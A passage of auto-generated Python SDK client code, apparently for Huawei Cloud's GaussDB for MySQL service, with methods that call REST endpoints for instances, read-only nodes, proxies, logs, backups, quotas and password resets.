resource_path='/v3/{project_id}/instances/{instance_id}/proxy',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='CreateGaussMySqlProxyResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def create_gauss_my_sql_readonly_node_async(self, request):
"""创建只读节点
创建只读节点。
:param CreateGaussMySqlReadonlyNodeRequest request
:return: CreateGaussMySqlReadonlyNodeResponse
"""
return self.create_gauss_my_sql_readonly_node_with_http_info(request)
def create_gauss_my_sql_readonly_node_with_http_info(self, request):
"""创建只读节点
创建只读节点。
:param CreateGaussMySqlReadonlyNodeRequest request
:return: CreateGaussMySqlReadonlyNodeResponse
"""
all_params = ['instance_id', 'mysql_create_readonly_node_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/nodes/enlarge',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='CreateGaussMySqlReadonlyNodeResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def delete_gauss_my_sql_instance_async(self, request):
"""删除实例
删除数据库实例,不支持删除包周期实例。
:param DeleteGaussMySqlInstanceRequest request
:return: DeleteGaussMySqlInstanceResponse
"""
return self.delete_gauss_my_sql_instance_with_http_info(request)
def delete_gauss_my_sql_instance_with_http_info(self, request):
"""删除实例
删除数据库实例,不支持删除包周期实例。
:param DeleteGaussMySqlInstanceRequest request
:return: DeleteGaussMySqlInstanceResponse
"""
all_params = ['instance_id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}',
method='DELETE',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='DeleteGaussMySqlInstanceResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def delete_gauss_my_sql_proxy_async(self, request):
"""关闭数据库代理
关闭数据库代理。
:param DeleteGaussMySqlProxyRequest request
:return: DeleteGaussMySqlProxyResponse
"""
return self.delete_gauss_my_sql_proxy_with_http_info(request)
def delete_gauss_my_sql_proxy_with_http_info(self, request):
"""关闭数据库代理
关闭数据库代理。
:param DeleteGaussMySqlProxyRequest request
:return: DeleteGaussMySqlProxyResponse
"""
all_params = ['instance_id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/proxy',
method='DELETE',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='DeleteGaussMySqlProxyResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def delete_gauss_my_sql_readonly_node_async(self, request):
"""删除只读节点
删除实例的只读节点。多可用区模式删除只读节点时,要保证删除后,剩余的只读节点和主节点在不同的可用区中,否则无法删除该只读节点。
:param DeleteGaussMySqlReadonlyNodeRequest request
:return: DeleteGaussMySqlReadonlyNodeResponse
"""
return self.delete_gauss_my_sql_readonly_node_with_http_info(request)
def delete_gauss_my_sql_readonly_node_with_http_info(self, request):
"""删除只读节点
删除实例的只读节点。多可用区模式删除只读节点时,要保证删除后,剩余的只读节点和主节点在不同的可用区中,否则无法删除该只读节点。
:param DeleteGaussMySqlReadonlyNodeRequest request
:return: DeleteGaussMySqlReadonlyNodeResponse
"""
all_params = ['instance_id', 'node_id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
if 'node_id' in local_var_params:
path_params['node_id'] = local_var_params['node_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/nodes/{node_id}',
method='DELETE',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='DeleteGaussMySqlReadonlyNodeResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def expand_gauss_my_sql_instance_volume_async(self, request):
"""包周期存储扩容
包周期存储扩容
:param ExpandGaussMySqlInstanceVolumeRequest request
:return: ExpandGaussMySqlInstanceVolumeResponse
"""
return self.expand_gauss_my_sql_instance_volume_with_http_info(request)
def expand_gauss_my_sql_instance_volume_with_http_info(self, request):
"""包周期存储扩容
包周期存储扩容
:param ExpandGaussMySqlInstanceVolumeRequest request
:return: ExpandGaussMySqlInstanceVolumeResponse
"""
all_params = ['instance_id', 'mysql_extend_instance_volume_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/volume/extend',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ExpandGaussMySqlInstanceVolumeResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def expand_gauss_my_sql_proxy_async(self, request):
"""扩容数据库代理节点的数量
扩容数据库代理节点的数量。 DeC专属云账号暂不支持数据库代理。
:param ExpandGaussMySqlProxyRequest request
:return: ExpandGaussMySqlProxyResponse
"""
return self.expand_gauss_my_sql_proxy_with_http_info(request)
def expand_gauss_my_sql_proxy_with_http_info(self, request):
"""扩容数据库代理节点的数量
扩容数据库代理节点的数量。 DeC专属云账号暂不支持数据库代理。
:param ExpandGaussMySqlProxyRequest request
:return: ExpandGaussMySqlProxyResponse
"""
all_params = ['instance_id', 'enlarge_proxy_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/proxy/enlarge',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ExpandGaussMySqlProxyResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_gauss_my_sql_configurations_async(self, request):
"""查询参数模板
获取参数模板列表,包括所有数据库的默认参数模板和用户创建的参数模板。
:param ListGaussMySqlConfigurationsRequest request
:return: ListGaussMySqlConfigurationsResponse
"""
return self.list_gauss_my_sql_configurations_with_http_info(request)
def list_gauss_my_sql_configurations_with_http_info(self, request):
"""查询参数模板
获取参数模板列表,包括所有数据库的默认参数模板和用户创建的参数模板。
:param ListGaussMySqlConfigurationsRequest request
:return: ListGaussMySqlConfigurationsResponse
"""
all_params = ['x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/configurations',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListGaussMySqlConfigurationsResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_gauss_my_sql_dedicated_resources_async(self, request):
"""查询专属资源池列表
获取专属资源池列表,包括用户开通的所有专属资源池信息。
:param ListGaussMySqlDedicatedResourcesRequest request
:return: ListGaussMySqlDedicatedResourcesResponse
"""
return self.list_gauss_my_sql_dedicated_resources_with_http_info(request)
def list_gauss_my_sql_dedicated_resources_with_http_info(self, request):
"""查询专属资源池列表
获取专属资源池列表,包括用户开通的所有专属资源池信息。
:param ListGaussMySqlDedicatedResourcesRequest request
:return: ListGaussMySqlDedicatedResourcesResponse
"""
all_params = ['x_language', 'offset', 'limit']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/dedicated-resources',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListGaussMySqlDedicatedResourcesResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_gauss_my_sql_error_log_async(self, request):
"""查询数据库错误日志
查询数据库错误日志。
:param ListGaussMySqlErrorLogRequest request
:return: ListGaussMySqlErrorLogResponse
"""
return self.list_gauss_my_sql_error_log_with_http_info(request)
def list_gauss_my_sql_error_log_with_http_info(self, request):
"""查询数据库错误日志
查询数据库错误日志。
:param ListGaussMySqlErrorLogRequest request
:return: ListGaussMySqlErrorLogResponse
"""
all_params = ['instance_id', 'start_date', 'end_date', 'x_language', 'offset', 'limit', 'level', 'node_id']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
if 'start_date' in local_var_params:
query_params.append(('start_date', local_var_params['start_date']))
if 'end_date' in local_var_params:
query_params.append(('end_date', local_var_params['end_date']))
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
if 'level' in local_var_params:
query_params.append(('level', local_var_params['level']))
if 'node_id' in local_var_params:
query_params.append(('node_id', local_var_params['node_id']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/errorlog',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListGaussMySqlErrorLogResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_gauss_my_sql_instances_async(self, request):
"""查询实例列表
根据指定条件查询实例列表。
:param ListGaussMySqlInstancesRequest request
:return: ListGaussMySqlInstancesResponse
"""
return self.list_gauss_my_sql_instances_with_http_info(request)
def list_gauss_my_sql_instances_with_http_info(self, request):
"""查询实例列表
根据指定条件查询实例列表。
:param ListGaussMySqlInstancesRequest request
:return: ListGaussMySqlInstancesResponse
"""
all_params = ['x_language', 'id', 'name', 'type', 'datastore_type', 'vpc_id', 'subnet_id', 'offset', 'limit']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
if 'id' in local_var_params:
query_params.append(('id', local_var_params['id']))
if 'name' in local_var_params:
query_params.append(('name', local_var_params['name']))
if 'type' in local_var_params:
query_params.append(('type', local_var_params['type']))
if 'datastore_type' in local_var_params:
query_params.append(('datastore_type', local_var_params['datastore_type']))
if 'vpc_id' in local_var_params:
query_params.append(('vpc_id', local_var_params['vpc_id']))
if 'subnet_id' in local_var_params:
query_params.append(('subnet_id', local_var_params['subnet_id']))
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListGaussMySqlInstancesResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_gauss_my_sql_slow_log_async(self, request):
"""查询数据库慢日志
查询数据库慢日志
:param ListGaussMySqlSlowLogRequest request
:return: ListGaussMySqlSlowLogResponse
"""
return self.list_gauss_my_sql_slow_log_with_http_info(request)
def list_gauss_my_sql_slow_log_with_http_info(self, request):
"""查询数据库慢日志
查询数据库慢日志
:param ListGaussMySqlSlowLogRequest request
:return: ListGaussMySqlSlowLogResponse
"""
all_params = ['instance_id', 'start_date', 'end_date', 'node_id', 'x_language', 'offset', 'limit', 'type']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
if 'start_date' in local_var_params:
query_params.append(('start_date', local_var_params['start_date']))
if 'end_date' in local_var_params:
query_params.append(('end_date', local_var_params['end_date']))
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
if 'type' in local_var_params:
query_params.append(('type', local_var_params['type']))
if 'node_id' in local_var_params:
query_params.append(('node_id', local_var_params['node_id']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/slowlog',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListGaussMySqlSlowLogResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def reset_gauss_my_sql_password_async(self, request):
"""重置数据库密码
重置数据库密码
:param ResetGaussMySqlPasswordRequest request
:return: ResetGaussMySqlPasswordResponse
"""
return self.reset_gauss_my_sql_password_with_http_info(request)
def reset_gauss_my_sql_password_with_http_info(self, request):
"""重置数据库密码
重置数据库密码
:param ResetGaussMySqlPasswordRequest request
:return: ResetGaussMySqlPasswordResponse
"""
all_params = ['instance_id', 'mysql_reset_password_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/password',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ResetGaussMySqlPasswordResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def set_gauss_my_sql_quotas_async(self, request):
"""设置租户基于企业项目的资源配额
设置指定企业项目的资源配额。
:param SetGaussMySqlQuotasRequest request
:return: SetGaussMySqlQuotasResponse
"""
return self.set_gauss_my_sql_quotas_with_http_info(request)
def set_gauss_my_sql_quotas_with_http_info(self, request):
"""设置租户基于企业项目的资源配额
设置指定企业项目的资源配额。
:param SetGaussMySqlQuotasRequest request
:return: SetGaussMySqlQuotasResponse
"""
all_params = ['x_language', 'set_quotas_request']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/quotas',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='SetGaussMySqlQuotasResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_backup_list_async(self, request):
"""查询备份列表
查询备份列表
:param ShowGaussMySqlBackupListRequest request
:return: ShowGaussMySqlBackupListResponse
"""
return self.show_gauss_my_sql_backup_list_with_http_info(request)
def show_gauss_my_sql_backup_list_with_http_info(self, request):
"""查询备份列表
查询备份列表
:param ShowGaussMySqlBackupListRequest request
:return: ShowGaussMySqlBackupListResponse
"""
all_params = ['x_language', 'instance_id', 'backup_id', 'backup_type', 'offset', 'limit', 'begin_time', 'end_time']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
if 'instance_id' in local_var_params:
query_params.append(('instance_id', local_var_params['instance_id']))
if 'backup_id' in local_var_params:
query_params.append(('backup_id', local_var_params['backup_id']))
if 'backup_type' in local_var_params:
query_params.append(('backup_type', local_var_params['backup_type']))
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
if 'begin_time' in local_var_params:
query_params.append(('begin_time', local_var_params['begin_time']))
if 'end_time' in local_var_params:
query_params.append(('end_time', local_var_params['end_time']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/backups',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlBackupListResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_backup_policy_async(self, request):
"""查询自动备份策略
查询自动备份策略。
:param ShowGaussMySqlBackupPolicyRequest request
:return: ShowGaussMySqlBackupPolicyResponse
"""
return self.show_gauss_my_sql_backup_policy_with_http_info(request)
def show_gauss_my_sql_backup_policy_with_http_info(self, request):
"""查询自动备份策略
查询自动备份策略。
:param ShowGaussMySqlBackupPolicyRequest request
:return: ShowGaussMySqlBackupPolicyResponse
"""
all_params = ['instance_id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/backups/policy',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlBackupPolicyResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_engine_version_async(self, request):
"""查询数据库引擎的版本
获取指定数据库引擎对应的数据库版本信息。
:param ShowGaussMySqlEngineVersionRequest request
:return: ShowGaussMySqlEngineVersionResponse
"""
return self.show_gauss_my_sql_engine_version_with_http_info(request)
def show_gauss_my_sql_engine_version_with_http_info(self, request):
"""查询数据库引擎的版本
获取指定数据库引擎对应的数据库版本信息。
:param ShowGaussMySqlEngineVersionRequest request
:return: ShowGaussMySqlEngineVersionResponse
"""
all_params = ['database_name', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'database_name' in local_var_params:
path_params['database_name'] = local_var_params['database_name']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/datastores/{database_name}',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlEngineVersionResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_flavors_async(self, request):
"""查询数据库规格
获取指定数据库引擎版本对应的规格信息。
:param ShowGaussMySqlFlavorsRequest request
:return: ShowGaussMySqlFlavorsResponse
"""
return self.show_gauss_my_sql_flavors_with_http_info(request)
def show_gauss_my_sql_flavors_with_http_info(self, request):
"""查询数据库规格
获取指定数据库引擎版本对应的规格信息。
:param ShowGaussMySqlFlavorsRequest request
:return: ShowGaussMySqlFlavorsResponse
"""
all_params = ['database_name', 'availability_zone_mode', 'x_language', 'version_name', 'spec_code']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'database_name' in local_var_params:
path_params['database_name'] = local_var_params['database_name']
query_params = []
if 'version_name' in local_var_params:
query_params.append(('version_name', local_var_params['version_name']))
if 'availability_zone_mode' in local_var_params:
query_params.append(('availability_zone_mode', local_var_params['availability_zone_mode']))
if 'spec_code' in local_var_params:
query_params.append(('spec_code', local_var_params['spec_code']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/flavors/{database_name}',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlFlavorsResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_instance_info_async(self, request):
"""查询实例详情信息
查询实例详情信息
:param ShowGaussMySqlInstanceInfoRequest request
:return: ShowGaussMySqlInstanceInfoResponse
"""
return self.show_gauss_my_sql_instance_info_with_http_info(request)
def show_gauss_my_sql_instance_info_with_http_info(self, request):
"""查询实例详情信息
查询实例详情信息
:param ShowGaussMySqlInstanceInfoRequest request
:return: ShowGaussMySqlInstanceInfoResponse
"""
all_params = ['instance_id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlInstanceInfoResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_job_info_async(self, request):
"""获取指定ID的任务信息
获取指定ID的任务信息。
:param ShowGaussMySqlJobInfoRequest request
:return: ShowGaussMySqlJobInfoResponse
"""
return self.show_gauss_my_sql_job_info_with_http_info(request)
def show_gauss_my_sql_job_info_with_http_info(self, request):
"""获取指定ID的任务信息
获取指定ID的任务信息。
:param ShowGaussMySqlJobInfoRequest request
:return: ShowGaussMySqlJobInfoResponse
"""
all_params = ['id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
if 'id' in local_var_params:
query_params.append(('id', local_var_params['id']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/jobs',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlJobInfoResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_project_quotas_async(self, request):
"""查询租户的实例配额
获取指定租户的资源配额。
:param ShowGaussMySqlProjectQuotasRequest request
:return: ShowGaussMySqlProjectQuotasResponse
"""
return self.show_gauss_my_sql_project_quotas_with_http_info(request)
def show_gauss_my_sql_project_quotas_with_http_info(self, request):
"""查询租户的实例配额
获取指定租户的资源配额。
:param ShowGaussMySqlProjectQuotasRequest request
:return: ShowGaussMySqlProjectQuotasResponse
"""
all_params = ['x_language', 'type']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
if 'type' in local_var_params:
query_params.append(('type', local_var_params['type']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/project-quotas',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlProjectQuotasResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_proxy_async(self, request):
"""查询数据库代理信息
查询数据库代理信息。
:param ShowGaussMySqlProxyRequest request
:return: ShowGaussMySqlProxyResponse
"""
